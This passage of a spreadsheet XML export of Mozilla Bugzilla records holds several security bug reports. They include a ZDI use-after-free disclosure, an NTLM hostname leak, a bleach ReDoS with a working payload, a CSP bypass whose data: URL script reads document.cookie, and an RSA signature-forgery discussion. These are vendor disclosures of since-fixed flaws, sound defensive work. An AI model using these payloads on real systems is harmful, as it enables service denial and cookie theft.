          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q6334" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6334" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6334" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T6334" t="n">
        <v>1</v>
      </c>
      <c r="U6334" t="n">
        <v>0</v>
      </c>
      <c r="V6334" t="n">
        <v>17</v>
      </c>
      <c r="W6334" t="inlineStr">
        <is>
          <t>Created attachment 684047
PoC
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s) Tested: Mozilla Firefox 13.0
Platform(s) Tested: Windows XP SP3
--------------------- 
Vulnerability details 
---------------------
The vulnerable function is Navigator::MozVibrate within dom/base/Navigator.cpp
From the researcher:
Note that |domDoc| is a weak pointer. As the "logic" of |JS_GetArrayLength()|
is under attacker's control, it is possible to force removal of object
currently pointed by |domDoc|. This will lead to |domDoc| becoming a dangling
pointer after the |JS_GetArrayLength()| call. Such stale pointer is then passed
to |VibrateWindowListener| constructor.
The code below triggers the vulnerability: 
--------------- 
Begin Code Snip 
---------------
&lt;!doctype html&gt;
&lt;!--
     Mozilla Firefox 13.0
     mozVibrate dangling pointer
     Windows XP SP3 x86 code exec
     regenrecht@o2.pl Jun 2012
--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body onload="run();"&gt;
&lt;/body&gt;
&lt;/html&gt;
--------------- 
End Code Snip 
---------------
This PoC will trigger the vulnerability and result in EIP being set to c1c2c1c2
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 180 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 180 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X6334" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6335">
      <c r="A6335" t="n">
        <v>1046421</v>
      </c>
      <c r="B6335" t="inlineStr">
        <is>
          <t>2014-07-30 15:42:05 -0700</t>
        </is>
      </c>
      <c r="C6335" t="inlineStr">
        <is>
          <t>Information disclosure vulnerability in Firefox via NTLM based HTTP authentication feature</t>
        </is>
      </c>
      <c r="D6335" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:18 -0700</t>
        </is>
      </c>
      <c r="E6335" t="n">
        <v>1</v>
      </c>
      <c r="F6335" t="n">
        <v>1</v>
      </c>
      <c r="G6335" t="n">
        <v>3</v>
      </c>
      <c r="H6335" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6335" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6335" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6335" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6335" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6335" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6335" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6335" t="inlineStr">
        <is>
          <t>[reporter-external][post-critsmash-triage][adv-main42+][tor 12974]</t>
        </is>
      </c>
      <c r="Q6335" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6335" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6335" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T6335" t="n">
        <v>1</v>
      </c>
      <c r="U6335" t="n">
        <v>0</v>
      </c>
      <c r="V6335" t="n">
        <v>38</v>
      </c>
      <c r="W6335" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Steps to reproduce:
I have no idea how seriously this bug will be treated however Firefox/Chrome (Multiplatform) along with Safari (OS X/iOS), Web Browser (BlackBerry) and IE (Windows) disclose the hostname and (in some cases the Windows domain) via NTLM based HTTP authentication when sending type 3 messages as part of the authentication exchange. 
NB: I've only approached Google so far, some help with co-ordination might be required, if it is deemed worth fixing.
An example URL to a web server capable of triggering this flaw can be made available on request, however I believe the bug is simple enough that it can easily be spotted in the source. I'm guessing populate that Firefox simply populates the Workstation field with the hostname of the system. By comparison, the original KHTML source tree is not affected (since that uses the hardcoded "WORKSTATION" value).
Actual results:
This can allow users to be tracked across the Internet. Some observations:
* The exploit can be triggered silently
* The exploit works irrespective of whether JavaScript is enabled
* The exploit works even in privacy mode
* The exploit can be triggered even if the user is behind a firewall and/or proxy
* The exploit can be utilised to aid in unmasking VPN and/or TOR users
Expected results:
Type 3 messages sent by Firefox should not disclose the users real hostname and/or Windows domain.</t>
        </is>
      </c>
      <c r="X6335" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6336">
      <c r="A6336" t="n">
        <v>119005</v>
      </c>
      <c r="B6336" t="inlineStr">
        <is>
          <t>2002-01-09 10:13:08 -0800</t>
        </is>
      </c>
      <c r="C6336" t="inlineStr">
        <is>
          <t>editgroups.cgi incorrectly states that bug group names cannot contain spaces</t>
        </is>
      </c>
      <c r="D6336" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E6336" t="n">
        <v>1</v>
      </c>
      <c r="F6336" t="n">
        <v>1</v>
      </c>
      <c r="G6336" t="n">
        <v>4</v>
      </c>
      <c r="H6336" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6336" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6336" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K6336" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L6336" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6336" t="inlineStr">
        <is>
          <t>FreeBSD</t>
        </is>
      </c>
      <c r="N6336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6336" t="inlineStr"/>
      <c r="Q6336" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6336" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6336" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6336" t="n">
        <v>1</v>
      </c>
      <c r="U6336" t="n">
        <v>0</v>
      </c>
      <c r="V6336" t="n">
        <v>6</v>
      </c>
      <c r="W6336" t="inlineStr">
        <is>
          <t>summary says it all</t>
        </is>
      </c>
      <c r="X6336" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6337">
      <c r="A6337" t="n">
        <v>1623633</v>
      </c>
      <c r="B6337" t="inlineStr">
        <is>
          <t>2020-03-19 06:59:52 -0700</t>
        </is>
      </c>
      <c r="C6337" t="inlineStr">
        <is>
          <t>Regular expression denial-of-service in mozilla/bleach BleachSanitizerFilter.sanitize_css gauntlet regular expression</t>
        </is>
      </c>
      <c r="D6337" t="inlineStr">
        <is>
          <t>2020-04-06 07:50:39 -0700</t>
        </is>
      </c>
      <c r="E6337" t="n">
        <v>1</v>
      </c>
      <c r="F6337" t="n">
        <v>1</v>
      </c>
      <c r="G6337" t="n">
        <v>4</v>
      </c>
      <c r="H6337" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6337" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J6337" t="inlineStr">
        <is>
          <t>Bleach-security</t>
        </is>
      </c>
      <c r="K6337" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6337" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6337" t="inlineStr"/>
      <c r="Q6337" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6337" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6337" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6337" t="n">
        <v>1</v>
      </c>
      <c r="U6337" t="n">
        <v>0</v>
      </c>
      <c r="V6337" t="n">
        <v>16</v>
      </c>
      <c r="W6337" t="inlineStr">
        <is>
          <t>Hi there,
I believe I've found a DoS bug in the [mozilla/bleach](https://github.com/mozilla/bleach) library. The bug itself is in the `BleachSanitizerFilter.sanitize_css` function. The vulnerability can be exploited with the following code:
```python
In [1]: import bleach
In [2]: bleach.__version__
Out[2]: '3.1.3'
In [3]: payload = "'" + '"a"' * 64 + '^' + "'"
In [4]: bleach.clean('&lt;a style=' + payload + '&gt;&lt;/a&gt;', attributes={'a': ['style']})
...Spins...
```
The bug itself is a [ReDoS bug](https://www.regular-expressions.info/redos.html). It occurs due to the `gauntlet` regular expression:
```python
gauntlet = re.compile(
    r"""^([-/:,#%.'"\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""",
    flags=re.U
)
```
The issue is mutually inclusive alternation nested inside a quantifier. In other words, two alternation statements (either/or via `|`) that have full overlap inside a quantifier (e.g. `+` or `*`). The overlapping statements are `"[\s\w]+"` and `[-/:,#%.'"\s!\w]` - these overlap such that `'"a"' * 64` in the payload causes catastrophic backtracking. We can also exploit this from `\w-\w` and `[-/:,#%.'"\s!\w]` with `'a-a' * 64`. The `^` in the payload matches none of the alternation statements, so when `$` is hit in the regular expression, it causes it to backtrack.
Note that, as seen in the demo payload, `attributes={'a': ['style']}` is required because bleach will not parse the style attribute by default. This is a mitigating factor that, as far as I can tell, prevents the functionality from being vulnerable by default. However, I likely did not exhaustively search all code paths that lead to `BleachSanitizerFilter.sanitize_css`. I would double check my work here to ensure there isn't another avenue which makes this exploitable by default.
Regarding a fix, my first choice/suggestion would be to not use regular expressions for sanitization. Not only can it lead to esoteric DoS bugs like this, but it's also difficult to ensure you're allowing the minimal set of text through that you would like. I realize it's a much larger effort to refactor this to not use regular expressions, so we can also patch up the expression itself. To do so we must ensure that none of the alternation statements can completely overlap with another. I believe the following expression should do the trick:
```python
gauntlet = re.compile(
    r"""^([/:,#%.\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""",
    flags=re.U
)
```
Note that we've removed the `-`, `'`, and `"` from the initial alternation statement. This avoids complete overlap with the 2nd, 3rd, and 4th alternation statements. Since the 1st statement doesn't include a `(` it cannot overlap with the 5th statement. If this expression breaks some of the logic necessary in the check we'll have to consider other options.
Hope this is helpful! Let me know if you have any questions and what the next steps are. One quick shoutout: I used [Dlint](https://github.com/dlint-py/dlint) + [r2c](https://app.r2c.dev/) to find this bug. Check them out if you're interested. If you're curious about ReDoS bugs, I'd recommend checking out this blog post: [Finding Python ReDoS bugs at scale using Dlint and r2c](https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/).</t>
        </is>
      </c>
      <c r="X6337" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6338">
      <c r="A6338" t="n">
        <v>1243482</v>
      </c>
      <c r="B6338" t="inlineStr">
        <is>
          <t>2016-01-27 11:32:10 -0800</t>
        </is>
      </c>
      <c r="C6338" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::Slot::getAttr] Slot.cpp:232</t>
        </is>
      </c>
      <c r="D6338" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:27 -0700</t>
        </is>
      </c>
      <c r="E6338" t="n">
        <v>1</v>
      </c>
      <c r="F6338" t="n">
        <v>1</v>
      </c>
      <c r="G6338" t="n">
        <v>3</v>
      </c>
      <c r="H6338" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6338" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6338" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K6338" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6338" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6338" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q6338" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6338" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6338" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6338" t="n">
        <v>1</v>
      </c>
      <c r="U6338" t="n">
        <v>0</v>
      </c>
      <c r="V6338" t="n">
        <v>12</v>
      </c>
      <c r="W6338" t="inlineStr">
        <is>
          <t>Created attachment 8712795
call_stack.txt
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)</t>
        </is>
      </c>
      <c r="X6338" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6339">
      <c r="A6339" t="n">
        <v>925308</v>
      </c>
      <c r="B6339" t="inlineStr">
        <is>
          <t>2013-10-10 04:37:58 -0700</t>
        </is>
      </c>
      <c r="C6339" t="inlineStr">
        <is>
          <t>Assertion failure: *(int*)size_ &gt;= 0, at vm/SPSProfiler.cpp:196</t>
        </is>
      </c>
      <c r="D6339" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:12 -0800</t>
        </is>
      </c>
      <c r="E6339" t="n">
        <v>1</v>
      </c>
      <c r="F6339" t="n">
        <v>1</v>
      </c>
      <c r="G6339" t="n">
        <v>3</v>
      </c>
      <c r="H6339" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6339" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6339" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6339" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6339" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6339" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6339" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6339" t="inlineStr">
        <is>
          <t>[fuzzblocker] [jsbugmon:update,ignore][adv-main27+]</t>
        </is>
      </c>
      <c r="Q6339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6339" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6339" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T6339" t="n">
        <v>1</v>
      </c>
      <c r="U6339" t="n">
        <v>0</v>
      </c>
      <c r="V6339" t="n">
        <v>32</v>
      </c>
      <c r="W6339" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision aa986b6ce882 (run with --fuzzing-safe --ion-eager):
var lfcode = new Array();
lfcode.push("3");
lfcode.push("enableSPSProfilingAssertions(false);foo();");
while (true) {
  var file = lfcode.shift(); if (file == undefined) { break; }
  loadFile(file)
}
function loadFile(lfVarx) {
    if (lfVarx.substr(-3) != ".js" &amp;&amp; lfVarx.length != 1) {
        switch (lfRunTypeId) {
            default: function newFunc(x) { new Function(x)(); }; newFunc(lfVarx); break;
        }
    } else if (!isNaN(lfVarx)) {
        lfRunTypeId = parseInt(lfVarx);
    }
}</t>
        </is>
      </c>
      <c r="X6339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6340">
      <c r="A6340" t="n">
        <v>1358009</v>
      </c>
      <c r="B6340" t="inlineStr">
        <is>
          <t>2017-04-19 22:29:15 -0700</t>
        </is>
      </c>
      <c r="C6340" t="inlineStr">
        <is>
          <t>Content-Security-Policy Bypass with data: URL opened in a new tab</t>
        </is>
      </c>
      <c r="D6340" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:07 -0700</t>
        </is>
      </c>
      <c r="E6340" t="n">
        <v>1</v>
      </c>
      <c r="F6340" t="n">
        <v>1</v>
      </c>
      <c r="G6340" t="n">
        <v>3</v>
      </c>
      <c r="H6340" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6340" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6340" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6340" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L6340" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6340" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6340" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6340" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6340" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T6340" t="n">
        <v>1</v>
      </c>
      <c r="U6340" t="n">
        <v>0</v>
      </c>
      <c r="V6340" t="n">
        <v>44</v>
      </c>
      <c r="W6340" t="inlineStr">
        <is>
          <t>Created attachment 8859873
testcase.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Build ID: 20170413192749
Steps to reproduce:
The Content-Security-Policy can be bypassed using a data: URL opened in a new tab.
Content-Security-Policy doesn't allow javascript execution code on the webpage which uses this security, but in Firefox, if a data: URL is loaded in a new tab, the javascript code contained into this data URL is executed and it can steal the cookie of the website (and others malicious actions).
example:
&lt;meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-eval'"&gt;
&lt;a href=" data:text/html;html,&lt;script&gt;alert(document.cookie);&lt;/script&gt;"&gt;Open Me in a new tab&lt;/a&gt;
Actual results:
The Content-Security-Policy can be bypassed if a data URL is opened into a new tab.
Expected results:
In Mozilla Firefox, if a Webpage uses the Content-Security-Policy security, javascript code shouldn't be executed with a data: URL opened in a new tab.</t>
        </is>
      </c>
      <c r="X6340" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6341">
      <c r="A6341" t="n">
        <v>1064636</v>
      </c>
      <c r="B6341" t="inlineStr">
        <is>
          <t>2014-09-08 17:34:24 -0700</t>
        </is>
      </c>
      <c r="C6341" t="inlineStr">
        <is>
          <t>RSA PKCS#1 signature verification forgery is possible due to too-permissive SignatureAlgorithm parameter parsing</t>
        </is>
      </c>
      <c r="D6341" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:02 -0700</t>
        </is>
      </c>
      <c r="E6341" t="n">
        <v>1</v>
      </c>
      <c r="F6341" t="n">
        <v>1</v>
      </c>
      <c r="G6341" t="n">
        <v>3</v>
      </c>
      <c r="H6341" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6341" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6341" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6341" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6341" t="inlineStr">
        <is>
          <t>[status-firefox-esr24:fixed][status-b2g-v1.3:fixed][status-b2g-v1.3t:fixed][adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q6341" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6341" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6341" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6341" t="n">
        <v>1</v>
      </c>
      <c r="U6341" t="n">
        <v>0</v>
      </c>
      <c r="V6341" t="n">
        <v>158</v>
      </c>
      <c r="W6341" t="inlineStr">
        <is>
          <t>In bug 1054659 comment 20, Antoine Delignat-Lavaud wrote:
&gt; It is indeed possible to attack RSA-PKCS#1v1.5 in NSS.
&gt; Earlier you pointed me to the file nss/lib/cryptohi/secvfy.c for signature
&gt; verification. Near the top of the file there's a function with this
&gt; interesting comment:
&gt; 
&gt;     /* make sure the "parameters" are not too bogus. */
&gt;     if (di-&gt;digestAlgorithm.parameters.len &gt; 2) {
&gt; 	goto sigloser;
&gt;     }
&gt; 
&gt; This allows PKCS#1 signatures to include up to two arbitrary parameters in
&gt; the unpadded ASN.1 structure, instead of the required NULL. This is quite
&gt; bad, because it opens up a Beichenbacher-like attack: using the homomorphic
&gt; signature property of RSA, it is possible to build from one or more valid
&gt; signatures, more valid signatures for a different hash, or even for a
&gt; different hash function. Thus, the attack I described above is in fact
&gt; possible even against RSA-PKCS#1.
&gt; 
&gt; Even though we initially thought this was a new variant, it turns out that
&gt; it was in fact already described by Oiwa et al. in the GNUTLS-SA-2006-4
&gt; report. Instead of explaining how it works precisely, I urge you to read
&gt; section 5 of
&gt; https://www.cdc.informatik.tu-darmstadt.de/reports/reports/sigflaw.pdf which
&gt; provides an excellent description of a practical exploit against e=3
&gt; signatures. However, please note that we were able to create a proof of
&gt; concept even for a e=65537 signature. Let me know if you'd like me to attach
&gt; it for a test case - we confirmed that neither IE/schannel nor OpenSSL, nor
&gt; GnuTLS are vulnerable.
Antoine, please attach it to this bug. Thanks!
When you say "up to two arbitrary parameters," you actually mean one parameter of at most two arbitrary bytes, right?</t>
        </is>
      </c>
      <c r="X6341" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6342">
      <c r="A6342" t="n">
        <v>690041</v>
      </c>
      <c r="B6342" t="inlineStr">
        <is>
          <t>2011-09-28 12:27:06 -0700</t>
        </is>
      </c>
      <c r="C6342" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.4.1 Oilspill Release</t>
        </is>
      </c>
      <c r="D6342" t="inlineStr">
        <is>
          <t>2011-10-02 19:38:29 -0700</t>
        </is>
      </c>
      <c r="E6342" t="n">
        <v>1</v>
      </c>
      <c r="F6342" t="n">
        <v>1</v>
      </c>
      <c r="G6342" t="n">
        <v>2</v>
      </c>
      <c r="H6342" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6342" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J6342" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K6342" t="inlineStr">
        <is>
          <t>SeaMonkey 2.4 Branch</t>
        </is>
      </c>
      <c r="L6342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6342" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6342" t="inlineStr"/>
      <c r="Q6342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6342" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6342" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6342" t="n">
        <v>1</v>
      </c>
      <c r="U6342" t="n">
        <v>0</v>
      </c>
      <c r="V6342" t="n">
        <v>8</v>
      </c>
      <c r="W6342" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #688682 +++
2.4.1 is to be an oilspill release for the Gecko 7.0.1 chemspill</t>
        </is>
      </c>
      <c r="X6342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6343">
      <c r="A6343" t="n">
        <v>115527</v>
      </c>
      <c r="B6343" t="inlineStr">
        <is>
          <t>2001-12-16 14:04:50 -0800</t>
        </is>
      </c>
      <c r="C6343" t="inlineStr">
        <is>
          <t>Trunk Crash when visiting webpages with redirections [@ nsTimerImpl::Process]</t>
        </is>
      </c>
      <c r="D6343" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E6343" t="n">
        <v>1</v>
      </c>
      <c r="F6343" t="n">
        <v>1</v>
      </c>
      <c r="G6343" t="n">
        <v>2</v>
      </c>
      <c r="H6343" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6343" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J6343" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6343" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6343" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6343" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6343" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6343" t="inlineStr"/>
      <c r="Q6343" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6343" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6343" t="inlineStr">
        <is>
          <t>mozilla0.9.8</t>
        </is>
      </c>
      <c r="T6343" t="n">
        <v>1</v>
      </c>
      <c r="U6343" t="n">
        <v>0</v>
      </c>
      <c r="V6343" t="n">
        <v>29</v>
      </c>
      <c r="W6343" t="inlineStr">
        <is>
          <t>Mozilla 2001121606 crashes immediately upon entering this site.
Talkback id: TB555964W</t>
        </is>
      </c>
      <c r="X6343" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6344">
      <c r="A6344" t="n">
        <v>86947</v>
      </c>
      <c r="B6344" t="inlineStr">
        <is>
          <t>2001-06-20 14:20:37 -0700</t>
        </is>
      </c>
      <c r="C6344" t="inlineStr">
        <is>
          <t>make vertical margins not require state recovery</t>
        </is>
      </c>
      <c r="D6344" t="inlineStr">
        <is>
          <t>2022-10-17 15:55:05 -0700</t>
        </is>
      </c>
      <c r="E6344" t="n">
        <v>1</v>
      </c>
      <c r="F6344" t="n">
        <v>1</v>
      </c>
      <c r="G6344" t="n">
        <v>3</v>
      </c>
      <c r="H6344" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6344" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6344" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6344" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6344" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6344" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
